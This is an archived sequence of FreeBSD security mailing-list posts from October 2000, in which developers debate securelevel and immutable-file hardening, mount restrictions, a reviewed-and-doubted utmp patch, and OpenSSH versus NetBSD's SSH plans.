Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 4DA9037B502 for ; Wed, 4 Oct 2000 11:47:18 -0700 (PDT)
Received: (qmail 90058 invoked by uid 1000); 4 Oct 2000 18:48:27 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 18:48:27 -0000
Date: Wed, 4 Oct 2000 13:48:27 -0500 (CDT)
From: Mike Silbersack
To: Bill Fumerola
Cc: "Jacques A. Vidrine" , cjclark@alum.mit.edu, freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
In-Reply-To: <20001004140436.K38472@jade.chc-chimes.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Oct 2000, Bill Fumerola wrote:

> also, see kern.ps_showallprocs. I sent a letter to bugtraq regarding
> kern.ps_showallprocs, but evidently approving posts of exploits that
> haven't been sent to the vendor takes up too much time and approving
> my post isn't a priority.
>
> --
> Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
> billf@chimesnet.com / billf@FreeBSD.org

Just tell them that the info was leaked onto freebsd-security already, and is in the wild. That should get it through.

Mike "Silby" Silbersack

From owner-freebsd-security Wed Oct 4 11:48:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id C4DE837B66D for ; Wed, 4 Oct 2000 11:48:34 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08769; Wed, 4 Oct 2000 14:48:30 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Wed, 4 Oct 2000 14:48:29 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: cjclark@alum.mit.edu
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Oct 2000, Robert Watson wrote:

> /etc/rc: (cd /var/run && cp /dev/null utmp && chmod 644
> utmp;)

It turns out their install script and rc patch modifications do this, although that isn't documented. However, they don't handle the newsyslog changes for wtmp, and their use of setgid displays a misunderstanding of how process credentials are managed in the kernel. This implementation worries me a bit, and I'm a little surprised they didn't post to freebsd-security requesting review before posting to bugtraq. All in all, I wouldn't recommend using these changes until they can be properly reviewed.

Robert N M Watson
robert@fledge.watson.org      http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Wed Oct 4 12:01:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id ACEDB37B502 for ; Wed, 4 Oct 2000 12:01:47 -0700 (PDT)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1178 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Wed, 4 Oct 2000 13:44:03 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Wed, 4 Oct 2000 13:43:59 -0500 (CDT)
From: James Wyatt
To: "Jacques A. Vidrine"
Cc: Bill Fumerola , freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
In-Reply-To: <20001004131508.A54413@hamlet.nectar.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Oct 2000, Jacques A. Vidrine wrote:
> On Wed, Oct 04, 2000 at 02:04:36PM -0400, Bill Fumerola wrote:
> > also, see kern.ps_showallprocs.
>
> Nifty, I missed that one. We need a man page with this kind of stuff.

An annotated list with text *would* be nicer than groping through sysctl.h and friends, but I learned a lot by using "sysctl -a | more" and using "find" to dive into /usr/src/sys. I *love* fishing into new OSes' internals and FreeBSD is a rich ocean, but some of us would like a fish sandwich. - Jy@

From owner-freebsd-security Wed Oct 4 12:07:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id F209E37B66E for ; Wed, 4 Oct 2000 12:07:27 -0700 (PDT)
Received: by puck.firepipe.net (Postfix, from userid 1000) id 3A9E4192C; Wed, 4 Oct 2000 14:07:48 -0500 (EST)
Date: Wed, 4 Oct 2000 14:07:48 -0500
From: Will Andrews
To: Trevor Johnson
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD History
Message-ID: <20001004140748.N26605@puck.firepipe.net>
Reply-To: Will Andrews
References: <200010041509.e94F9Tx35480@cwsys.cwsent.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from trevor@jpj.net on Wed, Oct 04, 2000 at 11:32:23AM -0400
X-Operating-System: FreeBSD 4.1-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 11:32:23AM -0400, Trevor Johnson wrote:
> See /usr/share/doc/en_US.ISO_8859-1/books/handbook/history.html .

&& /usr/share/misc/bsd-family-tree

--
Will Andrews - Physics Computer Network wench
The Universal Answer to All Problems - "It has something to do with physics."
-- Comic on door of Room 240, Physics Building, Purdue University

From owner-freebsd-security Wed Oct 4 12:17:03 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ADE2637B502; Wed, 4 Oct 2000 12:17:01 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA76265; Wed, 4 Oct 2000 12:17:01 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Wed, 4 Oct 2000 12:17:01 -0700
From: Kris Kennaway
To: Garrett Wollman
Cc: Kris Kennaway , Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
Message-ID: <20001004121701.C73561@freefall.freebsd.org>
References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> <20001004023249.B76230@freefall.freebsd.org> <200010041447.KAA54350@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200010041447.KAA54350@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Wed, Oct 04, 2000 at 10:47:15AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote:
> < said:
>
> > I think you're right. Which is a good reason why your /usr/bin should
> > be schg too ;-)
>
> Actually, sappnd on all the directories which might be in (or on the
> way to) root's path would be enough.

Except you can still just mount a doctored copy over the top of it :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed Oct 4 12:23:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 49CA137B502 for ; Wed, 4 Oct 2000 12:23:41 -0700 (PDT)
Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id PAA241704; Wed, 4 Oct 2000 15:23:39 -0400
Mime-Version: 1.0
X-Sender: drosih@mail.rpi.edu
Message-Id:
In-Reply-To:
References:
Date: Wed, 4 Oct 2000 15:23:38 -0400
To: , freebsd-security@FreeBSD.ORG
From: Garance A Drosihn
Subject: Re: OSSH and NetBSD's "OSSH" ?
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 2:44 PM -0400 10/4/00, wrote:
> Since we're trying to keep in sync with OpenSSH as the goal,
>has anyone given thought if we will maintain compatibility with
>NetBSD's "OpenSSH" replacement?
>
>I think their decision to do their own implementation is just daft.
>But I am curious as to how this will affect things. I am guessing
>we will just sync with OSSH and if NetBSD's version happens to be
>compat, fine; if not, too bad, so sad. This whole thing really annoys
>me. But I am curious about others' thoughts.

I don't follow NetBSD, so I don't know what their replacement is or why they did it. My gut reaction is that I'd rather see freebsd stick with openssh.com's implementation, just because that is what I'll be using on many other unix platforms here at RPI. If NetBSD has a different implementation, and if that includes some "neat feature" that we would like, I would still prefer to see us work on getting THAT FEATURE into openssh.com's implementation, if possible.

I would hope that whatever they have, it should already be "compatible" with both openssh and the original ssh implementations, except for new features that they have added. Since I have no idea what this openssh-replacement is, or what benefits it might offer, there isn't much more I can say about it.
---
Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu
Senior Systems Programmer or drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Wed Oct 4 12:35:25 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58D5237B502; Wed, 4 Oct 2000 12:35:23 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA82717; Wed, 4 Oct 2000 12:35:23 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Wed, 4 Oct 2000 12:35:23 -0700
From: Kris Kennaway
To: scanner@jurai.net
Cc: freebsd-security@freebsd.org
Subject: Re: OSSH and NetBSD's "OSSH" ?
Message-ID: <20001004123523.G73561@freefall.freebsd.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from scanner@jurai.net on Wed, Oct 04, 2000 at 02:44:27PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 02:44:27PM -0400, scanner@jurai.net wrote:
>
> Since we're trying to keep in sync with OpenSSH as the goal, has anyone
> given thought if we will maintain compatibility with NetBSD's
> "OpenSSH" replacement?
>
> I think their decision to do their own implementation is just daft. But I
> am curious as to how this will affect things. I am guessing we will just
> sync with OSSH and if NetBSD's version happens to be compat fine if not
> too bad so sad. This whole thing really annoys me. But I am curious about
> others' thoughts.

I didn't know they have decided to fork their own version - all I've seen in their cvs logs is integration of the OpenBSD version. At any rate, I will be continuing to track the OpenBSD version, and compatibility is something which the OpenBSD and NetBSD guys will have to work out for themselves.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed Oct 4 15:46:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id BAD7F37B502 for ; Wed, 4 Oct 2000 15:46:09 -0700 (PDT)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id RAA02750; Wed, 4 Oct 2000 17:46:07 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-110.max1.wa.cyberlynk.net(207.227.118.110) by peak.mountin.net via smap (V1.3) id sma002748; Wed Oct 4 17:45:41 2000
Message-Id: <4.3.2.20001004173510.00afd880@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Wed, 04 Oct 2000 17:39:42 -0500
To: Dima Dorfman
From: "Jeffrey J. Mountin"
Subject: Re: BSD chpass (fwd)
Cc: security@FreeBSD.ORG
In-Reply-To: <20001004100859.33A4A1F0A@static.unixfreak.org>
References: <20001004023249.B76230@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote:
> IMO, the bottom line is, schg can only prevent an attacker if they
> don't have a good understanding of the system (which accounts for most
> of the script kid population). A really clever attacker would modify
> your securelevel settings in rc.conf, reboot the machine making it
> look like a panic or power surge (if they know you exclusively access
> it remotely), fool around, then change it back. Tripwire on a r/o disk
> would tell you about it, but you can't do that remotely unless you plan
> on never touching any system binaries. Or am I missing something?

And why wouldn't you protect /etc as well? Then one would rely on physical security to change the security settings. A real PITA for remote systems, but even that could be worked around with some care to allow changes (reboot still required) and protect the system.
Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

From owner-freebsd-security Wed Oct 4 17: 4:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 0640637B503; Wed, 4 Oct 2000 17:04:40 -0700 (PDT)
Received: by static.unixfreak.org (Postfix, from userid 1000) id 1035B1F0A; Wed, 4 Oct 2000 17:04:34 -0700 (PDT)
Subject: Re: Re[2]: BSD chpass (fwd)
In-Reply-To: <12917380571.20001004204942@buz.ch> from Gabriel Ambuehl at "Oct 4, 2000 08:49:42 pm"
To: Gabriel Ambuehl
Date: Wed, 4 Oct 2000 17:04:34 -0700 (PDT)
Cc: Dima Dorfman , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG
From: Dima Dorfman
Reply-To: dima@unixfreak.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20001005000434.1035B1F0A@static.unixfreak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Hello Dima,
>
> Wednesday, October 04, 2000, 12:08:59 PM, you wrote:
> > of the script kid population). A really clever attacker would modify
> > your securelevel settings in rc.conf, reboot the machine making it
> > look like a panic or power surge
>
> What about setting schg for it as well? You'd just need to find a
> way

Then they'd go change /etc/rc. You could set most of your root filesystem, including /etc, schg, which may help, but then you'd be making your machine almost unmanageable without console access. For example, how would you fix this chpass bug if you couldn't access the console and had no way to lower the securelevel, even with a reboot?

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
"If you understand everything, you must be misinformed."
-- Japanese Proverb

From owner-freebsd-security Wed Oct 4 17:14: 1 2000
Delivered-To: freebsd-security@freebsd.org
Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B7E8F37B503; Wed, 4 Oct 2000 17:13:59 -0700 (PDT)
Received: by static.unixfreak.org (Postfix, from userid 1000) id 835C11F0A; Wed, 4 Oct 2000 17:13:59 -0700 (PDT)
Subject: Re: BSD chpass (fwd)
In-Reply-To: <20001004121701.C73561@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 12:17:01 pm"
To: Kris Kennaway
Date: Wed, 4 Oct 2000 17:13:59 -0700 (PDT)
Cc: Garrett Wollman , Kris Kennaway , Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG
From: Dima Dorfman
Reply-To: dima@unixfreak.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20001005001359.835C11F0A@static.unixfreak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote:
> > < said:
> >
> > > I think you're right. Which is a good reason why your /usr/bin should
> > > be schg too ;-)
> >
> > Actually, sappnd on all the directories which might be in (or on the
> > way to) root's path would be enough.
>
> Except you can still just mount a doctored copy over the top of it
> :-)

Actually, now that I think about it, this can be deterred to a certain point. If you're running with securelevel >= 2, you can't load KLDs, and you can't run newfs. What would you mount? A vn device? Nope, unless the KLD is already loaded. A floppy? If you have physical access, you have better alternatives. You'd probably have to unmount another live filesystem and mount it in that place. Depending on what it is, you may have to erase some files on it, which isn't something which would go unnoticed by the admin. Then you have MFS and md, but those may not be in the kernel (and again, no KLDs). Maybe NFS. What else?

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
"Don't talk about yourself, it will be done when you leave."
-- Wilson Mizner

From owner-freebsd-security Wed Oct 4 17:24:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 89C8537B503 for ; Wed, 4 Oct 2000 17:24:10 -0700 (PDT)
Received: by static.unixfreak.org (Postfix, from userid 1000) id 309DF1F0A; Wed, 4 Oct 2000 17:24:10 -0700 (PDT)
Subject: Re: BSD chpass (fwd)
In-Reply-To: <4.3.2.20001004173510.00afd880@207.227.119.2> from "Jeffrey J. Mountin" at "Oct 4, 2000 05:39:42 pm"
To: "Jeffrey J. Mountin"
Date: Wed, 4 Oct 2000 17:24:10 -0700 (PDT)
Cc: Dima Dorfman , security@FreeBSD.ORG
From: Dima Dorfman
Reply-To: dima@unixfreak.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20001005002410.309DF1F0A@static.unixfreak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote:
>
> > IMO, the bottom line is, schg can only prevent an attacker if they
> > don't have a good understanding of the system (which accounts for most
> > of the script kid population). A really clever attacker would modify
> > your securelevel settings in rc.conf, reboot the machine making it
> > look like a panic or power surge (if they know you exclusively access
> > it remotely), fool around, then change it back. Tripwire on a r/o disk
> > would tell you about it, but you can't do that remotely unless you plan
> > on never touching any system binaries. Or am I missing something?
>
> And why wouldn't you protect /etc as well? Then one would rely on physical
> security to change the security settings. A real PITA for remote systems,
> but even that could be worked around with some care to allow changes
> (reboot still required) and protect the system.

You could, but your system would become almost unmanageable. Relying on going to single user mode to do basic maintenance (say you had fingerd on in inetd, but now you want to turn it off in light of the recent hole) isn't such a good idea. In my experience, if doing something is a big hassle, it generally doesn't get done. Say someone discovers a small local DoS in some service you're running. Assuming nobody untrusted has an account, a local DoS isn't such a big threat. Since you have to physically walk to the machine, boot it to single user mode (causing minor downtime), and change it, you'd probably decide to leave it alone. After a while it builds up, and your machine slowly deteriorates.
And if you ever can't get to the machine and there's a serious remote hole, you're in trouble.

Another good example of this is the recent threads about supporting older releases. Everybody agrees it should be done, but nobody wants to do it. I'm pretty sure that if it was simply a matter of running `cvs commit` in two different branches (e.g. the same code would work in all branches) it wouldn't be such a big problem. Since they probably have to tweak the code to work on another branch, they don't do it.

Regards

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
"A problem well stated is a problem half solved."
-- Charles F. Kettering

From owner-freebsd-security Wed Oct 4 17:45:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id B1D0637B502; Wed, 4 Oct 2000 17:45:10 -0700 (PDT)
Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id e950hma68036; Thu, 5 Oct 2000 01:43:48 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.0) with ESMTP id e950h3n29195; Thu, 5 Oct 2000 01:43:03 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200010050043.e950h3n29195@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Kris Kennaway
Cc: scanner@jurai.net, freebsd-security@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: OSSH and NetBSD's "OSSH" ?
In-Reply-To: Message from Kris Kennaway of "Wed, 04 Oct 2000 12:35:23 PDT." <20001004123523.G73561@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 05 Oct 2000 01:43:03 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Wed, Oct 04, 2000 at 02:44:27PM -0400, scanner@jurai.net wrote:
> >
> > Since we're trying to keep in sync with OpenSSH as the goal, has anyone
> > given thought if we will maintain compatibility with NetBSD's
> > "OpenSSH" replacement?
> >
> > I think their decision to do their own implementation is just daft. But I
> > am curious as to how this will affect things. I am guessing we will just
> > sync with OSSH and if NetBSD's version happens to be compat fine if not
> > too bad so sad. This whole thing really annoys me. But I am curious about
> > others' thoughts.
>
> I didn't know they have decided to fork their own version - all I've
> seen in their cvs logs is integration of the openbsd version. At any
> rate, I will be continuing to track the openbsd version, and
> compatibility is something which the open and netbsd guys will have to
> work out for themselves.

They've imported OpenSSH while they develop their own ``cleancode'' implementation (I think that was the terminology they used).

> Kris
>
> --
> In God we Trust -- all others must submit an X.509 certificate.
> -- Charles Forsythe

--
Brian
Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Wed Oct 4 20:10:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp4.port.ru (mx5.port.ru [194.67.23.40]) by hub.freebsd.org (Postfix) with ESMTP id 9C56037B503 for ; Wed, 4 Oct 2000 20:10:35 -0700 (PDT)
Received: from [195.162.49.72] (helo=sorhed) by smtp4.port.ru with smtp (Exim 3.14 #27) id 13h1QX-0006OH-00 for security@freebsd.org; Thu, 05 Oct 2000 07:10:33 +0400
Message-ID: <002c01c02e82$529cae40$3431a2c3@sorhed>
From: "Alexander Temerev"
To:
Subject: unsubscribe
Date: Thu, 5 Oct 2000 10:11:20 +0600
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Fidolook Express 2.000 for MS OE5
Organization: Fidolook Express 2.000 www.fidolook.da.ru
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

unsubscribe

From owner-freebsd-security Wed Oct 4 21:56:29 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 2373C37B503 for ; Wed, 4 Oct 2000 21:56:25 -0700 (PDT)
Received: (from docs@localhost) by mailer.progressive-comp.com with id AAA32275; Thu, 5 Oct 2000 00:53:21 -0400
Date: Thu, 5 Oct 2000 00:53:21 -0400
Message-Id: <200010050453.AAA32275@mailer.progressive-comp.com>
From: Hank Leininger
Reply-To: Hank Leininger
To: freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2000-10-05, Dima Dorfman wrote:
> > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote:
> > Except you can still just mount a doctored copy over the top of it
> Actually, now that I think about it, this can be deterred to a certain
> point. If you're running with securelevel >= 2, you can't load KLDs,
> and you can't run newfs. What would you mount? A vn device? Nope,
> unless the KLD is already loaded. A floppy? If you have physical

Perhaps this is a stupid question, but why is mount particularly needed at high securelevels? So long as unmount(2) can be called by shutdown scripts. Hm... remounting / ro before halt/reboot perhaps... but perhaps that behavior could be straightforwardly special-cased? It's not like mount(2) is a hot path =) And/or, disallow mounts to mount points which are not regular, empty directories, if securelevel >= 2? What legit uses (that could not be learned around by an admin) would this break?

--
Hank Leininger

From owner-freebsd-security Wed Oct 4 22: 9:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 810DC37B502; Wed, 4 Oct 2000 22:09:13 -0700 (PDT)
Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50485; Wed, 4 Oct 2000 22:09:06 -0700 (PDT) (envelope-from obrien)
Date: Wed, 4 Oct 2000 22:09:06 -0700
From: "David O'Brien"
To: Paul Richards
Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001004220906.D50210@dragon.nuxi.com>
Reply-To: obrien@FreeBSD.org
References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from paul@originative.co.uk on Tue, Oct 03, 2000 at 11:40:21PM +0100
X-Operating-System: FreeBSD 5.0-CURRENT
Organization: The NUXI BSD group
X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A
X-Pgp-Rsa-Keyid: 1024/34F9F9D5
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote:
> Stable would stagnate to some extent, certainly more so than it
> presently does, but I think that's exactly what should happen to a
> stable branch.

I disagree that a stable branch should stagnate to some extent -- so how do we come to a meeting of the minds?

--
-- David (obrien@FreeBSD.org)

From owner-freebsd-security Wed Oct 4 22:10:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 21E7737B502 for ; Wed, 4 Oct 2000 22:10:40 -0700 (PDT)
Received: (from docs@localhost) by mailer.progressive-comp.com with id BAA00326; Thu, 5 Oct 2000 01:07:42 -0400
Date: Thu, 5 Oct 2000 01:07:42 -0400
Message-Id: <200010050507.BAA00326@mailer.progressive-comp.com>
From: Hank Leininger
Reply-To: Hank Leininger
To: freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2000-10-05, Hank Leininger wrote:
> at high securelevels? So long as unmount(2) can be called by shutdown

Duh, s/un/u/. Need coffee.

--
Hank Leininger

From owner-freebsd-security Wed Oct 4 22:15:25 2000
Delivered-To: freebsd-security@freebsd.org
Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 1734A37B66D for ; Wed, 4 Oct 2000 22:15:22 -0700 (PDT)
Received: by static.unixfreak.org (Postfix, from userid 1000) id C907D1F21; Wed, 4 Oct 2000 22:15:21 -0700 (PDT)
Subject: Re: BSD chpass (fwd)
In-Reply-To: <200010050453.AAA32275@mailer.progressive-comp.com> from Hank Leininger at "Oct 5, 2000 00:53:21 am"
To: Hank Leininger
Date: Wed, 4 Oct 2000 22:15:21 -0700 (PDT)
Cc: freebsd-security@FreeBSD.ORG
From: Dima Dorfman
Reply-To: dima@unixfreak.org
X-Mailer: ELM [version 2.4ME+ PL61 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20001005051521.C907D1F21@static.unixfreak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On 2000-10-05, Dima Dorfman wrote:
> > > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote:
> > > Except you can still just mount a doctored copy over the top of it
>
> > Actually, now that I think about it, this can be deterred to a certain
> > point. If you're running with securelevel >= 2, you can't load KLDs,
> > and you can't run newfs. What would you mount? A vn device? Nope,
> > unless the KLD is already loaded. A floppy? If you have physical
>
> Perhaps this is a stupid question, but why is mount particularly needed at
> high securelevels? So long as unmount(2) can be called by shutdown
> scripts. Hm... remounting / ro before halt/reboot perhaps... but perhaps
> that behavior could be straightforwardly special-cased? It's not like
> mount(2) is a hot path =) And/or, disallow mounts to mount points which
> are not regular, empty directories, if securelevel >= 2? What legit uses
> (that could not be learned around by an admin) would this break?

Disallowing mounts altogether will break on-request mounting of volumes by things like amd(8), which is quite important, IMO. Disallowing mounts on non-empty directories and other "irregular" files is another story. While there are some legitimate uses for this, they are far less common.

Regards

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
"War doesn't determine who's right, it determines who's left."
-- Confucius

